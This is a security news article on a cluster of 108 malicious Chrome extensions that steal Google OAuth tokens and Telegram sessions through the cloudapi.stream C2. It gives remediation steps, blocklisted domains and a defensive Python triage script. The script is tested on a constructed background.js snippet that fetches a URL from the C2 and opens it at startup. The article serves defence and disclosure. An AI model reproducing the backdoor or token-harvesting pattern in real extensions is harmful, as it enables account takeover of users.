108 Malicious Chrome Extensions Caught Stealing Google Tokens and Telegram Sessions
Introduction
Security researchers at Socket have uncovered a coordinated cluster of 108 malicious Chrome extensions that share a single command-and-control infrastructure. Collectively installed roughly 20,000 times, the extensions harvest Google OAuth tokens, hijack Telegram sessions, inject ads, and open a backdoor that lets the operator push arbitrary URLs to every infected browser.
What Happened
The 108 extensions were published under five different developer identities — Yana Project, GameGen, SideGames, Rodeo Games, and InterAlt — but all phone home to the same C2 domain: cloudapi.stream. The campaign breaks down into several attack modules:
- Google account harvesting — 54 of the extensions call the chrome.identity.getAuthToken API to silently obtain OAuth2 tokens, then exfiltrate email addresses, names, profile pictures, and account IDs to mines.cloudapi.stream/auth_google.
- Telegram session theft — An extension named "Telegram Multi-account" scrapes Telegram Web's localStorage and session tokens every 15 seconds. Stolen sessions are sent to tg.cloudapi.stream/save_session.php. The C2 also supports remote session replacement, giving the attacker full account takeover without needing credentials.
- Universal backdoor — 45 extensions include a loadInfo() function that fires on every browser startup. It fetches a URL from the C2 and opens it silently, meaning the operator can push phishing pages, redirects, or exploit kits to every victim at will.
- Security header stripping — The extensions use Chrome's declarativeNetRequest API to strip Content-Security-Policy, X-Frame-Options, and CORS headers from responses, enabling further injection attacks on sites that would otherwise block them.
- Ad injection — JavaScript is injected into YouTube and TikTok pages to overlay or replace legitimate ads with the attacker's monetization payloads.
The infrastructure points to a Russian-language malware-as-a-service operation with centralized operator control.
Why It Matters
Browser extensions occupy a uniquely privileged position. They run with the user's identity, access every page the user visits, and persist across browser restarts. Unlike phishing emails that require a click, a malicious extension installed once keeps exfiltrating silently. The OAuth token theft is especially dangerous — those tokens can be used to access Google Drive, Gmail, and Workspace APIs without triggering MFA prompts.
Who Is Affected
- Any Chrome or Chromium-based browser user who installed extensions from the five publisher accounts
- Organizations that allow unmanaged browser extension installation
- Google Workspace and Telegram users whose sessions may have been hijacked
- Approximately 20,000 installations were recorded before discovery
How to Protect Yourself
Audit installed extensions immediately. Open chrome://extensions and review everything. Remove any extension from the five publisher names listed above (Yana Project, GameGen, SideGames, Rodeo Games, InterAlt).
For enterprise environments, enforce an extension allowlist via Chrome group policy. The allowlist only takes effect when everything else is blocked, so pair the ExtensionInstallAllowlist key with an ExtensionInstallBlocklist entry of "*", as the JSON policy below does:
Registry: HKLM\SOFTWARE\Policies\Google\Chrome\ExtensionInstallAllowlist
Or via Chrome Enterprise JSON policy:
{
  "ExtensionInstallBlocklist": ["*"],
  "ExtensionInstallAllowlist": ["<approved_extension_id_1>", "<approved_extension_id_2>"]
}
Revoke compromised Google tokens. Go to Google Account Security and review third-party app access. Remove anything unfamiliar.
Rotate Telegram sessions. In Telegram Desktop or Web, go to Settings > Devices > Terminate All Other Sessions.
Monitor for indicators. Block the C2 domain at your DNS or firewall level:
cloudapi.stream
mines.cloudapi.stream
tg.cloudapi.stream
Deploy endpoint detection that monitors chrome.identity.getAuthToken abuse and unusual declarativeNetRequest rule changes.
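The following triage script is an added example, not code from Socket's report or from any tool it names. It applies the indicators above to an unpacked extension: the identity and declarativeNetRequest permissions, a direct chrome.identity.getAuthToken call, a startup listener that opens a tab (a heuristic for the loadInfo() backdoor), and any URL pointing at cloudapi.stream or one of its subdomains. The sample manifest and background script are constructed to resemble the described behaviour; the function and variable names are my own.

```python
import json
import pathlib
import re

# Permissions the article names as abused by this cluster, plus the host-access
# variant of declarativeNetRequest that can rewrite headers on arbitrary sites.
RISKY_PERMISSIONS = {"identity", "declarativeNetRequest",
                     "declarativeNetRequestWithHostAccess"}
# Reported C2 domain; matched as a suffix so mines./tg. subdomains are caught too.
C2_DOMAIN = "cloudapi.stream"
URL_HOST_RE = re.compile(r"https?://([a-z0-9.-]+)", re.I)

def triage(manifest, sources):
    """Findings for one unpacked extension: manifest is the parsed manifest.json,
    sources maps filename -> JavaScript text."""
    findings = []
    perms = set(manifest.get("permissions", [])) | set(manifest.get("optional_permissions", []))
    for p in sorted(perms & RISKY_PERMISSIONS):
        findings.append(f"requests permission '{p}'")
    hosts = set(manifest.get("host_permissions", []))
    if "<all_urls>" in hosts or any(h.startswith("*://*/") for h in hosts):
        findings.append("has host access to all sites")
    for name, js in sources.items():
        if "chrome.identity.getAuthToken" in js:
            findings.append(f"{name}: calls chrome.identity.getAuthToken")
        # Heuristic for the startup backdoor: a startup listener that opens a tab.
        if "chrome.runtime.onStartup" in js and "chrome.tabs.create" in js:
            findings.append(f"{name}: opens a tab on browser startup")
        for host in URL_HOST_RE.findall(js):
            host = host.lower()
            if host == C2_DOMAIN or host.endswith("." + C2_DOMAIN):
                findings.append(f"{name}: contacts known C2 host {host}")
    return findings

def triage_dir(ext_dir):
    """Triage an unpacked extension folder, e.g. one copied from the profile's Extensions/ dir."""
    root = pathlib.Path(ext_dir)
    manifest = json.loads((root / "manifest.json").read_text(encoding="utf-8"))
    sources = {str(p.relative_to(root)): p.read_text(encoding="utf-8", errors="ignore")
               for p in root.rglob("*.js")}
    return triage(manifest, sources)

# Constructed sample modelled on the article's description; not a real extension.
SAMPLE_MANIFEST = {"manifest_version": 3, "name": "Constructed Multi-account",
                   "permissions": ["identity", "declarativeNetRequest", "storage"],
                   "host_permissions": ["<all_urls>"]}
SAMPLE_SOURCES = {"background.js": "chrome.runtime.onStartup.addListener(() => fetch("
    "'https://tg.cloudapi.stream/next').then(r => r.text()).then(u => chrome.tabs.create({url: u})));\n"
    "chrome.identity.getAuthToken({interactive: false}, t => {});"}
```

Running triage(SAMPLE_MANIFEST, SAMPLE_SOURCES) yields six findings; triage_dir() does the same for a real unpacked extension folder. A hit on the permission or host checks alone is a lead to review, not proof of compromise, since many legitimate extensions request them.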